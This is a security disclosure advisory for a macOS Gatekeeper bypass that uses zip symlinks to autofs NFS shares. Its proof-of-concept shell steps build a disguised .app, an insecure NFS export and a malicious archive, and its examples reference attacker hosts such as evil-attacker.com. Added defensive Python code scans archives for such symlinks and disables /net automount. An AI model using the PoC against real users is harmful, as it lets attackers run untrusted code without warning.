MacOS X GateKeeper Bypass
OVERVIEW
On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to
execute untrusted code without any warning or the user's explicit permission.
Gatekeeper is a mechanism developed by Apple and included in MacOS X since 2012 that enforces code
signing and verifies downloaded applications before allowing them to run.
For example, if a user downloads an application from the internet and executes it, Gatekeeper will prevent it from
running without the user's consent.
DETAILS
By design, Gatekeeper considers both external drives and network shares as safe locations and it allows
any application they contain to run.
By combining this design with two legitimate features of MacOS X, the intended behaviour can be completely
defeated.
The first legitimate feature is automount (aka autofs), which allows a user to automatically mount a network share just
by accessing a "special" path, in this case, any path beginning with "/net/".
For example:
ls /net/evil-attacker.com/sharedfolder/
will make the OS read the content of the 'sharedfolder' on the remote host (evil-attacker.com) using NFS.
The second legitimate feature is that zip archives can contain symbolic links pointing to an arbitrary location
(including automount endpoints) and that the software on MacOS that is responsible for decompressing zip files
does not perform any check on the symlinks before creating them.
To better understand how this exploit works, let's consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint he/she controls
(e.g. Documents -> /net/evil.com/Documents) and sends it to the victim.
The victim downloads the malicious archive, extracts it and follows the symlink.
Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled
executable can be run without any warning. The way Finder is designed (e.g. it hides .app extensions and hides the full path
from the title bar) makes this technique very effective and hard to spot.
The following video illustrates the concept
PoC
In order to reproduce this issue, follow the steps below:
• create a zip file with a symlink to an automount endpoint
    mkdir Documents
    ln -s /net/linux-vm.local/nfs/Documents Documents/Documents
    zip -ry Documents.zip Documents
• create an application (.app folder) with the code you want to run
    cp -r /Applications/Calculator.app PDF.app
    echo -e '#!/bin/bash'"\n"'open /Applications/iTunes.app' > PDF.app/Contents/MacOS/Calculator
    chmod +x PDF.app/Contents/MacOS/Calculator
    rm PDF.app/Contents/Resources/AppIcon.icns
    ln -s /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/GenericFolderIcon.icns PDF.app/Contents/Resources/AppIcon.icns
• create a publicly accessible NFS share and put the .app in it
    ssh linux-vm.local
    mkdir -p /nfs/Documents
    echo '/nfs/Documents *(insecure,rw,no_root_squash,anonuid=1000,anongid=1000,async,nohide)' >> /etc/exports
    service nfs-kernel-server restart
    scp -r mymac.local:PDF.app /nfs/Documents/
• upload the zip somewhere on the internet and download it so it gets the quarantine flag used by Gatekeeper
• extract the zip (if needed) and navigate it
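The archive produced by the PoC above is detectable before extraction: a zip symlink is just an entry whose body is the link target, so a scanner can refuse any entry that resolves under /net/ (or otherwise escapes the archive). This is an added example, not part of the advisory; the host name evil.example and the sample archive are constructed for illustration.

```python
import io
import posixpath
import stat
import zipfile

AUTOMOUNT_PREFIX = "/net/"  # autofs trigger path named in the advisory


def build_sample_zip(link_target: str) -> bytes:
    """Construct, in memory, an archive shaped like the PoC: a 'Documents'
    folder holding one benign file and a symlink 'Documents/Documents'
    pointing at link_target. Constructed test data, not a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Documents/readme.txt", "benign file\n")
        info = zipfile.ZipInfo("Documents/Documents")
        # A zip symlink is an ordinary entry whose body is the link target;
        # the Unix mode (with S_IFLNK) lives in the high 16 bits of external_attr.
        info.external_attr = (stat.S_IFLNK | 0o777) << 16
        info.create_system = 3  # 3 = Unix, so extractors honour the mode bits
        zf.writestr(info, link_target)
    return buf.getvalue()


def find_risky_symlinks(zip_bytes: bytes) -> list:
    """Scan an archive before extraction and return (entry, target, reason)
    for every symlink that leaves the archive. Targets under /net/ are
    tagged 'automount' (the Gatekeeper bypass path); any other absolute
    or parent-traversing target is tagged 'escapes-archive'."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not stat.S_ISLNK(info.external_attr >> 16):
                continue  # regular files and directories are not the concern here
            target = zf.read(info).decode("utf-8", "replace")
            norm = posixpath.normpath(target)  # collapses "/net/../etc" -> "/etc"
            if norm == "/net" or norm.startswith(AUTOMOUNT_PREFIX):
                hits.append((info.filename, target, "automount"))
            elif norm.startswith("/") or norm == ".." or norm.startswith("../"):
                hits.append((info.filename, target, "escapes-archive"))
    return hits


if __name__ == "__main__":
    # evil.example is a constructed placeholder host, not a real share
    for hit in find_risky_symlinks(build_sample_zip("/net/evil.example/Documents")):
        print("REFUSE TO EXTRACT: %s -> %s (%s)" % hit)
```

The same check generalises to any archive format that preserves symlinks; the quarantine flag does not help here because the executable never lives in the quarantined archive.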
HISTORY
The vendor was contacted on February 22nd 2019 and is aware of this issue. According to
the vendor, this issue was supposed to be addressed on May 15th 2019, but Apple started dropping my emails.
Since Apple is aware of my 90 days disclosure deadline, I make this information public.
SOLUTION
No solution is available yet.
A possible workaround is to disable automount:
• Edit /etc/auto_master as root
• Comment out the line beginning with '/net'
• Reboot
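The workaround above edits one map line of /etc/auto_master; the following added helper (not from the advisory) audits whether the '/net' map is still active and produces the hardened file text, leaving every other map untouched. The sample file content is constructed to mirror the stock macOS layout; the hardened text is printed rather than written, and the reboot step still applies.

```python
import os


def _map_entries(auto_master: str):
    """Yield (line_index, mount_point) for every active (uncommented) map
    line of an auto_master file; the first field of a line is the mount point."""
    for idx, line in enumerate(auto_master.splitlines()):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        yield idx, stripped.split()[0]


def net_automount_enabled(auto_master: str) -> bool:
    """True while an active '/net' map line is present, i.e. while any path
    under /net/ will still trigger a mount of a remote share."""
    return any(mp == "/net" for _, mp in _map_entries(auto_master))


def disable_net_automount(auto_master: str) -> str:
    """Return the file text with every active '/net' line commented out and
    everything else (comments, /home, /Network/Servers, static maps) untouched."""
    targets = {idx for idx, mp in _map_entries(auto_master) if mp == "/net"}
    lines = auto_master.splitlines(keepends=True)
    return "".join("#" + ln if i in targets else ln for i, ln in enumerate(lines))


# Constructed sample modelled on the stock macOS auto_master layout.
SAMPLE_AUTO_MASTER = (
    "# Automounter master map\n"
    "+auto_master\t\t# Use directory service\n"
    "/net\t\t\t-hosts\t\t-nobrowse,hidefromfinder,nosuid\n"
    "/home\t\t\tauto_home\t-nobrowse,hidefromfinder\n"
    "/Network/Servers\t-fstab\n"
    "/-\t\t\t-static\n"
)

if __name__ == "__main__":
    path = "/etc/auto_master"
    text = open(path).read() if os.path.exists(path) else SAMPLE_AUTO_MASTER
    print("/net automount active:", net_automount_enabled(text))
    # Print the hardened text instead of writing it; edit the real file as root.
    print(disable_net_automount(text), end="")
```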
REFERENCES
https://fcvl.net/
https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass
CREDITS
Filippo Cavallarin
filippo.cavallarin@wearesegment.com